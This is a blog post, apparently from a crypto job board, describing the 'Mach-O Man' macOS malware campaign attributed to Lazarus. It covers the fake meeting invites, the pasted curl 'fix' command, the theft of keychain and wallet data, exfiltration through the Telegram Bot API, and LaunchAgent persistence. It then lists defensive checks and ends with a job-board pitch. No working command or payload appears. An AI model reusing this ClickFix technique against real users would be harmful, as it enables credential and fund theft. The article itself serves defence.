North Korea Just Sent Your CEO a Fake Zoom Invite — Then Drained Their Crypto Wallet
You accept the Zoom invite. The meeting doesn’t load. A pop-up tells you to run a quick terminal command to fix the connection. You do it. Your keychain, your wallet, your credentials — gone. North Korea already has them. The malware deleted itself before you refreshed the page.
That’s “Mach-O Man.” And it’s targeting your CEO right now.
What Is Mach-O Man?
Discovered by security researchers at Bitso’s Quetzal Team and the ANY.RUN sandbox platform on April 21-22, 2026, Mach-O Man is a modular macOS malware kit attributed to North Korea’s Lazarus Group — the same crew that stole $285 million from Drift Protocol on April 1 and $292 million from KelpDAO on April 18.
This isn’t a software exploit. There’s no zero-day, no patch to apply. It’s pure social engineering — and it’s devastatingly effective.
The Attack: Four Steps to Total Compromise
Step 1 — The Invite: A victim receives an “urgent” meeting invite on Telegram from what appears to be a colleague, partner, or recruiter. The link goes to a fake-but-convincing Zoom, Microsoft Teams, or Google Meet lookalike (think domains like update-teams.live).
Step 2 — The Fix: The fake meeting site displays a connection error and instructs the user to copy-paste a single curl command into their Mac terminal to “fix the issue.” This bypasses macOS Gatekeeper entirely — because the user is running it, not an unsigned app.
Step 3 — The Harvest: The command downloads teamsSDK.bin, which deploys a four-stage infection chain:
- Prompts for the macOS password (deliberately fails twice, accepts on the third attempt to seem legitimate)
- Enumerates all running processes and browser extensions across Chrome, Firefox, Safari, Brave, Opera, and Vivaldi
- Steals browser cookies, SQLite credential databases, and macOS Keychain entries — including crypto wallet seeds
Step 4 — Vanish: All stolen data is compressed and exfiltrated via the Telegram Bot API. The malware then self-deletes, leaving no trace on disk. Victims typically don’t know they’ve been hit until funds disappear.
Why This Is Different From Previous Lazarus Attacks
Previous Lazarus campaigns targeted crypto protocols directly — compromising code, exploiting smart contracts, or bribing insiders. Mach-O Man flips the script: it targets the humans who control the keys.
Security researcher Mauro Eldritch, founder of threat intelligence firm BCA Ltd, who flagged the campaign, described it as a significant evolution in Lazarus tradecraft. The modular design means the kit is already being used by actors beyond Lazarus — it’s been commercialized.
Crypto wallet Zerion confirmed losing approximately $100,000 in a related mid-April incident using AI-enabled social engineering — likely an early Mach-O Man deployment. At the protocol level, Lazarus has now stolen over $577 million in April 2026 alone across Drift, KelpDAO, and individual targets.
Mach-O Man Persistence (In Case You Don’t Catch It)
If the malware isn’t intercepted during exfiltration, it establishes persistence via a renamed Onedrive process dropped into hidden directories, with a LaunchAgent entry ensuring it restarts on every login. It’s designed to survive reboots and blend into normal enterprise software names.
How to Protect Your Team Right Now
Security teams should act immediately:
- Audit LaunchAgents — check
~/Library/LaunchAgents/and/Library/LaunchAgents/for unexpected entries - Block outbound Telegram API traffic at the network level (
api.telegram.org) - Monitor for
curlexecutions from terminal — flag any that download binaries to temp directories - Never paste terminal commands from meeting links — establish this as a hard policy
- Verify meeting invites out-of-band — call or text the person who sent the invite before joining
- Rotate credentials for anyone who may have been targeted
Why This Matters for Crypto Jobs
The Mach-O Man campaign is creating immediate demand across the industry:
Security Engineers specializing in macOS threat detection and endpoint protection are now critical hires at every crypto firm with more than a handful of employees. The ability to detect Lazarus-style ClickFix campaigns, audit LaunchAgents, and monitor for unusual curl activity is now a baseline requirement.
Threat Intelligence Analysts who track North Korean APT groups are in serious demand — firms that couldn’t justify the spend six months ago are now scrambling. Understanding Lazarus Group TTPs (tactics, techniques, and procedures) is a career-defining skill in 2026.
Security-Aware Developers and Protocol Engineers are commanding premium salaries. The Drift and KelpDAO breaches demonstrated that technical roles carry existential security responsibilities — firms are now vetting for security mindset at every engineering level.
Executive Security / CISO roles at crypto-native companies are being created at a pace not seen since the 2022 bear market cleanup. Boards want someone accountable before the next fake Zoom invite lands.
If you’re breaking into Web3 security or looking to level up, right now is the moment. The threat is real, the budget is unlocked, and the roles are open.
Looking for your next role in crypto security or Web3 engineering? Browse open positions at cryptogrind.com — the job board built for builders, not suits.
